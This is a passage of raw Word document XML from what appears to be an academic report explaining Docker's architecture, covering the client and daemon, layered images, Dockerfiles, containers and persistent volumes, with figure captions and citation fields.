              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00683081">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="1DEED235" w14:textId="6884731C" w:rsidR="00D269F0" w:rsidRDefault="00D269F0" w:rsidP="00D269F0">
      <w:r>
        <w:t>The client and Docker daemon can be installed on the host machine and communicate using API.</w:t>
      </w:r>
      <w:r w:rsidR="009525FB">
        <w:t xml:space="preserve"> Also, the client can interact with more than one Docker daemon. The Docker system uses various plugins to create and run Docker objects, such as images, containers, volumes, and network</w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="009525FB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00712F52">
        <w:t xml:space="preserve"> Further, Docker system enables users to create images locally</w:t>
      </w:r>
      <w:r w:rsidR="0012322C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00712F52">
        <w:t xml:space="preserve">publish them to </w:t>
      </w:r>
      <w:r w:rsidR="004120EF">
        <w:t>either public or private repositories</w:t>
      </w:r>
      <w:r w:rsidR="00755836">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00755836">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004120EF">
        <w:t xml:space="preserve">pull </w:t>
      </w:r>
      <w:r w:rsidR="00755836">
        <w:t>them</w:t>
      </w:r>
      <w:r w:rsidR="004120EF">
        <w:t xml:space="preserve"> from the registries to run</w:t>
      </w:r>
      <w:r w:rsidR="00755836">
        <w:t xml:space="preserve"> and start</w:t>
      </w:r>
      <w:r w:rsidR="004120EF">
        <w:t xml:space="preserve"> containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612E3867" w14:textId="1B417981" w:rsidR="004A4A99" w:rsidRDefault="009525FB" w:rsidP="004A4A99">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc87032893"/>
      <w:r>
        <w:t>Docker Images</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="39DEF7CC" w14:textId="50A9B690" w:rsidR="009D1EB2" w:rsidRDefault="009D1EB2" w:rsidP="009D1EB2">
      <w:r>
        <w:t>In Docker, images are the building blocks</w:t>
      </w:r>
      <w:r w:rsidR="00941255">
        <w:t xml:space="preserve"> or template</w:t>
      </w:r>
      <w:r w:rsidR="00D90E90">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to create containers. It </w:t>
      </w:r>
      <w:r w:rsidR="00941255">
        <w:t>contains a set of instructions to run a container containing all the needed packages</w:t>
      </w:r>
      <w:r w:rsidR="00431A20">
        <w:t xml:space="preserve"> and parameters</w:t>
      </w:r>
      <w:r w:rsidR="00941255">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007C3623">
        <w:t xml:space="preserve"> It is built </w:t>
      </w:r>
      <w:r w:rsidR="007C3623">
        <w:lastRenderedPageBreak/>
        <w:t>with multiple read-only layers</w:t>
      </w:r>
      <w:r w:rsidR="0009318F">
        <w:t>, where each layer is established from its preceding layer</w:t>
      </w:r>
      <w:r w:rsidR="0012322C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00315F7C">
        <w:t>thus speed</w:t>
      </w:r>
      <w:r w:rsidR="0012322C">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00315F7C">
        <w:t xml:space="preserve"> up the Docker build process and increas</w:t>
      </w:r>
      <w:r w:rsidR="0012322C">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00315F7C">
        <w:t xml:space="preserve"> reusability.</w:t>
      </w:r>
      <w:r w:rsidR="008E4865">
        <w:t xml:space="preserve"> As a result</w:t>
      </w:r>
      <w:r w:rsidR="00422452">
        <w:t xml:space="preserve">, Docker is fast, lightweight, and small </w:t>
      </w:r>
      <w:r w:rsidR="00136D3B">
        <w:t>compared to other technologies.</w:t>
      </w:r>
      <w:r w:rsidR="008E4865">
        <w:t xml:space="preserve"> Images </w:t>
      </w:r>
      <w:r w:rsidR="00FF4784">
        <w:t>enable</w:t>
      </w:r>
      <w:r w:rsidR="008E4865">
        <w:t xml:space="preserve"> users to create a container on the writable layer</w:t>
      </w:r>
      <w:r w:rsidR="00431A20">
        <w:t xml:space="preserve"> on top of the read-only layers</w:t>
      </w:r>
      <w:r w:rsidR="00085FF0">
        <w:t>, allowing them</w:t>
      </w:r>
      <w:r w:rsidR="00FF4784">
        <w:t xml:space="preserve"> to make changes without modifying the base image</w:t>
      </w:r>
      <w:r w:rsidR="00431A20">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00085FF0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA2EB1">
        <w:t xml:space="preserve">For this reason, images can be duplicated and shared </w:t>
      </w:r>
      <w:r w:rsidR="00085FF0">
        <w:t>across the Docker repository. Usually, images can be created</w:t>
      </w:r>
      <w:r w:rsidR="00C33938">
        <w:t xml:space="preserve"> manually </w:t>
      </w:r>
      <w:r w:rsidR="00DE48AC">
        <w:t xml:space="preserve">using a simple text editor with a set of </w:t>
      </w:r>
      <w:r w:rsidR="00842C90">
        <w:t xml:space="preserve">series </w:t>
      </w:r>
      <w:r w:rsidR="00DE48AC">
        <w:t xml:space="preserve">commands to run and build an image. </w:t>
      </w:r>
      <w:r w:rsidR="00102BA3">
        <w:t>Alternatively</w:t>
      </w:r>
      <w:r w:rsidR="00DE48AC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00102BA3">
        <w:t>image</w:t>
      </w:r>
      <w:r w:rsidR="00842C90">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00102BA3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00842C90">
        <w:t>can be c</w:t>
      </w:r>
      <w:r w:rsidR="009514FD">
        <w:t>onstructed</w:t>
      </w:r>
      <w:r w:rsidR="00842C90">
        <w:t xml:space="preserve"> based</w:t>
      </w:r>
      <w:r w:rsidR="009514FD">
        <w:t xml:space="preserve"> on other images,</w:t>
      </w:r>
      <w:r w:rsidR="00842C90">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00102BA3">
        <w:t>published by other</w:t>
      </w:r>
      <w:r w:rsidR="009A11AC">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="005E7301">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009514FD">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00102BA3">
        <w:t xml:space="preserve"> shared via the Docker hub</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1295255404"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="008032CC">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="008032CC">
            <w:instrText xml:space="preserve"> CITATION DNü20 \l 2057  \m CZh18</w:instrText>
          </w:r>
          <w:r w:rsidR="00FE0853">
            <w:instrText xml:space="preserve"> \m DSk19</w:instrText>
          </w:r>
          <w:r w:rsidR="008032CC">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[25, 26, 27]</w:t>
          </w:r>
          <w:r w:rsidR="008032CC">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00102BA3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F03625">
        <w:t xml:space="preserve"> The layered structure of </w:t>
      </w:r>
      <w:r w:rsidR="00BA6774">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00F03625">
        <w:t>Docker image is shown in figure 4, where multiple containers are running on the writable layer</w:t>
      </w:r>
      <w:r w:rsidR="00BA6774">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F03625">
        <w:t xml:space="preserve"> all sharing the same </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00F03625">
        <w:t xml:space="preserve"> image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E17C1B2" w14:textId="69CD85BB" w:rsidR="005E7301" w:rsidRDefault="005E7301" w:rsidP="005E7301">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73A92FA6" wp14:editId="001B09FE">
            <wp:extent cx="3666839" cy="25576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68699" cy="2558918"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C903AE4" w14:textId="2A051751" w:rsidR="00F03625" w:rsidRPr="00F03625" w:rsidRDefault="00F03625" w:rsidP="00F03625">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc86858595"/>
      <w:bookmarkStart w:id="46" w:name="_Toc86867485"/>
      <w:r w:rsidRPr="00F03625">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00F03625">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F03625">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00F03625">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F03625">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F03625">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Docker image layers</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-1795354235"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="00F03625">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00F03625">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION doc20 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00F03625">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[28]</w:t>
          </w:r>
          <w:r w:rsidRPr="00F03625">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00F03625">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="65C87F1F" w14:textId="54F716B2" w:rsidR="00E66A4B" w:rsidRDefault="00E66A4B" w:rsidP="009D1EB2">
      <w:r>
        <w:t xml:space="preserve">The Dockerfile </w:t>
      </w:r>
      <w:r w:rsidR="0080469C">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0080469C">
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0080469C">
        <w:t xml:space="preserve"> a script, consisting of various commands and parameters to create a base Docker image.</w:t>
      </w:r>
      <w:r w:rsidR="00476379">
        <w:t xml:space="preserve"> It specifies the instructions in a sequential order with key attributes, such as </w:t>
      </w:r>
      <w:r w:rsidR="00A16F28">
        <w:t>ports, file directory, base OS, and many others.</w:t>
      </w:r>
      <w:r w:rsidR="007F548D">
        <w:t xml:space="preserve"> Usually, a Dockerfile starts with FROM command, defining the base OS of the image</w:t>
      </w:r>
      <w:r w:rsidR="000F3ABC">
        <w:t xml:space="preserve">. The subsequent layers </w:t>
      </w:r>
      <w:r w:rsidR="00F17826">
        <w:t xml:space="preserve">also specify instructions to execute </w:t>
      </w:r>
      <w:r w:rsidR="00903F25">
        <w:t>and run the application</w:t>
      </w:r>
      <w:r w:rsidR="00060543">
        <w:t>, such as port</w:t>
      </w:r>
      <w:r w:rsidR="002B7561">
        <w:t xml:space="preserve"> entry</w:t>
      </w:r>
      <w:r w:rsidR="00060543">
        <w:t>, copy files, directory, and add files</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1187791217"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00F95091">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F95091">
            <w:instrText xml:space="preserve"> CITATION SBh18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00F95091">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[29]</w:t>
          </w:r>
          <w:r w:rsidR="00F95091">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00060543">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006E3101">
        <w:t xml:space="preserve"> The screenshot below shows a sample of Dockerfile. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119C0D5D" w14:textId="20096994" w:rsidR="0030422A" w:rsidRDefault="0030422A" w:rsidP="0030422A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C049457" wp14:editId="7822DD74">
            <wp:extent cx="3519477" cy="1757733"/>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72030" cy="1783979"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2424118F" w14:textId="5A8264D7" w:rsidR="006E3101" w:rsidRDefault="006E3101" w:rsidP="006E3101">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc86858596"/>
      <w:bookmarkStart w:id="48" w:name="_Toc86867486"/>
      <w:r w:rsidRPr="006E3101">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="006E3101">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="006E3101">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="006E3101">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="006E3101">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="006E3101">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: sample Dockerfile.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="050C2113" w14:textId="64727623" w:rsidR="006E3101" w:rsidRDefault="006E3101" w:rsidP="006E3101">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc87032894"/>
      <w:r>
        <w:t>Containers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="2BAA56BF" w14:textId="7505DC51" w:rsidR="00BA3876" w:rsidRDefault="002A33E1" w:rsidP="00955EA7">
      <w:r>
        <w:t xml:space="preserve">A container is the </w:t>
      </w:r>
      <w:r w:rsidR="00EB76CA">
        <w:t>critical</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> object in the Docker system and is built by images.</w:t>
      </w:r>
      <w:r w:rsidR="001201F1">
        <w:t xml:space="preserve"> Containers </w:t>
      </w:r>
      <w:r w:rsidR="00AB268A">
        <w:t xml:space="preserve">package an application’s </w:t>
      </w:r>
      <w:r w:rsidR="007204A4">
        <w:t xml:space="preserve">software into a virtualised runtime environment with </w:t>
      </w:r>
      <w:r w:rsidR="003C14E0">
        <w:t>all packages</w:t>
      </w:r>
      <w:r w:rsidR="00AB268A">
        <w:t xml:space="preserve"> and dependencies </w:t>
      </w:r>
      <w:r w:rsidR="007204A4">
        <w:t>needed to run an application</w:t>
      </w:r>
      <w:r w:rsidR="003C14E0">
        <w:t xml:space="preserve">. Each container runs in its </w:t>
      </w:r>
      <w:r w:rsidR="00EB76CA">
        <w:t xml:space="preserve">virtualised </w:t>
      </w:r>
      <w:r w:rsidR="003C14E0">
        <w:t>environment, completely isolated from the host and other containers.</w:t>
      </w:r>
      <w:r w:rsidR="00EB76CA">
        <w:t xml:space="preserve"> However, </w:t>
      </w:r>
      <w:r w:rsidR="00F50863">
        <w:t xml:space="preserve">they can </w:t>
      </w:r>
      <w:r w:rsidR="00DE0A8A">
        <w:t>connect</w:t>
      </w:r>
      <w:r w:rsidR="00F50863">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D09AE">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00F50863">
        <w:t xml:space="preserve">each other or the host over a network. </w:t>
      </w:r>
      <w:r w:rsidR="00BE2F55">
        <w:t>Containers run on the writable layer without modifying the base image. This implies</w:t>
      </w:r>
      <w:r w:rsidR="00EB76CA">
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidR="007E2247">
        <w:t xml:space="preserve">a container can have </w:t>
      </w:r>
      <w:r w:rsidR="00EB76CA">
        <w:t>various</w:t>
      </w:r>
      <w:r w:rsidR="007E2247">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00026056">
        <w:t>lifecycles</w:t>
      </w:r>
      <w:r w:rsidR="007E2247">
        <w:t>, such as stop, delete, create, start</w:t>
      </w:r>
      <w:r w:rsidR="00EB76CA">
        <w:t xml:space="preserve">, and are </w:t>
      </w:r>
      <w:r w:rsidR="00302210">
        <w:t>managed</w:t>
      </w:r>
      <w:r w:rsidR="00EB76CA">
        <w:t xml:space="preserve"> using API or CLI.</w:t>
      </w:r>
      <w:r w:rsidR="00F50863">
        <w:t xml:space="preserve"> Consequently, containers are ephemeral, unlike images</w:t>
      </w:r>
      <w:r w:rsidR="00BA3876">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1636673492"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00BA3876">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00BA3876">
            <w:instrText xml:space="preserve">CITATION JSp19 \m NKh19 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00BA3876">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[30, 31]</w:t>
          </w:r>
          <w:r w:rsidR="00BA3876">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00BA3876">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C728C6" w14:textId="5D42EFD8" w:rsidR="008557B4" w:rsidRDefault="00BA3876" w:rsidP="00955EA7">
      <w:r>
        <w:t>In Docker, d</w:t>
      </w:r>
      <w:r w:rsidR="006E1715">
        <w:t xml:space="preserve">ata </w:t>
      </w:r>
      <w:r w:rsidR="00302210">
        <w:t>cannot be</w:t>
      </w:r>
      <w:r w:rsidR="006E1715">
        <w:t xml:space="preserve"> retrieved </w:t>
      </w:r>
      <w:r w:rsidR="00302210">
        <w:t xml:space="preserve">once a container is deleted or stopped </w:t>
      </w:r>
      <w:r w:rsidR="006E1715">
        <w:t xml:space="preserve">unless persistent storage is </w:t>
      </w:r>
      <w:r w:rsidR="00DE0A8A">
        <w:t xml:space="preserve">attached </w:t>
      </w:r>
      <w:r w:rsidR="006E1715">
        <w:t>to s</w:t>
      </w:r>
      <w:r w:rsidR="00DE0A8A">
        <w:t>ave</w:t>
      </w:r>
      <w:r w:rsidR="006E1715">
        <w:t xml:space="preserve"> the changes.</w:t>
      </w:r>
      <w:r w:rsidR="009E5924">
        <w:t xml:space="preserve"> However, Docker uses volumes to save the data permanently. </w:t>
      </w:r>
      <w:r w:rsidR="000C3022">
        <w:t xml:space="preserve">Containers are </w:t>
      </w:r>
      <w:r w:rsidR="000601AD">
        <w:t>portable, small, and fast to spin up because they do not require a guest OS</w:t>
      </w:r>
      <w:r w:rsidR="00EA2B6D">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="000601AD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA2B6D">
        <w:t>instead, they use the host’s OS resources and features</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-486011134"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00EA2B6D">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve">CITATION Mud19 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00EA2B6D">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[32]</w:t>
          </w:r>
          <w:r w:rsidR="00EA2B6D">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00EA2B6D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
